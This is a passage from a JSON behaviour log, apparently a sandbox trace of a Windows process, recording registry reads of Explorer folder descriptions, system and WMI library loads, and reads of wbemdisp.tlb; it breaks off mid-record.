          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Stream",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 120,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\PublishExpandedPath",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 121,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\DefinitionFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 122,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\Attributes",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 123,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\FolderTypeID",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 124,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{6D809377-6AF0-444b-8957-A3773F02200E}\\InitFolderHandler",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 125,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir",
          "content": "C:\\Program Files"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 126,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Category",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 127,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Name",
          "content": "SystemX86"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 128,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParentFolder",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 129,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Description",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 130,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\RelativePath",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 131,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParsingName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 132,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InfoTip",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 133,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalizedName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 134,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Icon",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 135,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Security",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 136,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResource",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 137,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResourceType",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,156",
        "eid": 138,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalRedirectOnly",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 139,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Roamable",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 140,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PreCreate",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 141,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Stream",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 142,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PublishExpandedPath",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 143,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\DefinitionFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 144,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Attributes",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 145,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\FolderTypeID",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 146,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InitFolderHandler",
          "content": null
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 147,
        "data": {
          "file": "ntdll.dll",
          "pathtofile": null,
          "moduleaddress": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 148,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Category",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 149,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Name",
          "content": "System"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 150,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParentFolder",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 151,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Description",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 152,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\RelativePath",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 153,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParsingName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 154,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InfoTip",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 155,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalizedName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 156,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Icon",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 157,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Security",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 158,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResource",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 159,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResourceType",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 160,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalRedirectOnly",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 161,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Roamable",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 162,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PreCreate",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 163,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Stream",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 164,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\PublishExpandedPath",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 165,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\DefinitionFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 166,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Attributes",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 167,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\FolderTypeID",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 168,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InitFolderHandler",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 169,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Category",
          "content": "2"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 170,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Name",
          "content": "Windows"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 171,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParentFolder",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 172,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Description",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 173,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\RelativePath",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 174,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\ParsingName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 175,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InfoTip",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 176,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalizedName",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 177,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Icon",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 178,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Security",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 179,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResource",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 180,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\StreamResourceType",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 181,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\LocalRedirectOnly",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 182,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Roamable",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 183,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PreCreate",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 184,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Stream",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 185,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\PublishExpandedPath",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 186,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\DefinitionFlags",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 187,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\Attributes",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 188,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\FolderTypeID",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:26,172",
        "eid": 189,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\InitFolderHandler",
          "content": null
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:28,406",
        "eid": 190,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies",
          "content": null
        }
      },
      {
        "event": "findwindow",
        "object": "windowname",
        "timestamp": "2025-11-20 10:58:28,437",
        "eid": 191,
        "data": {
          "classname": "#32771",
          "windowname": ""
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:29,469",
        "eid": 192,
        "data": {
          "file": "API-MS-Win-Core-LocalRegistry-L1-1-0.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee1090000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:29,469",
        "eid": 193,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffed9590000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:29,469",
        "eid": 194,
        "data": {
          "file": "C:\\Windows\\System32\\advapi32.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee2b50000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:29,484",
        "eid": 195,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemprox.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffedc850000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:29,484",
        "eid": 196,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wmiutils.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffedc210000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:29,531",
        "eid": 197,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemsvc.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffed94f0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:29,531",
        "eid": 198,
        "data": {
          "file": "api-ms-win-core-localization-l1-2-0.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee1090000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:29,531",
        "eid": 199,
        "data": {
          "file": "api-ms-win-core-localization-obsolete-l1-1-0.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffee1090000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:29,719",
        "eid": 200,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\fastprox.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffed3fc0000"
        }
      },
      {
        "event": "load",
        "object": "library",
        "timestamp": "2025-11-20 10:58:29,719",
        "eid": 201,
        "data": {
          "file": "amsi.dll",
          "pathtofile": null,
          "moduleaddress": "0x7ffede1c0000"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,750",
        "eid": 202,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)",
          "content": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:29,750",
        "eid": 203,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:29,750",
        "eid": 204,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:29,750",
        "eid": 205,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
        }
      },
      {
        "event": "read",
        "object": "registry",
        "timestamp": "2025-11-20 10:58:29,750",
        "eid": 206,
        "data": {
          "regkey": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CodePage\\1252",
          "content": "c_1252.nls"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:29,750",
        "eid": 207,
        "data": {
          "file": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
        }
      },
      {
        "event": "read",
        "object": "file",
        "timestamp": "2025-11-20 10:58:29,750",
        "eid": 208,
        "data": {
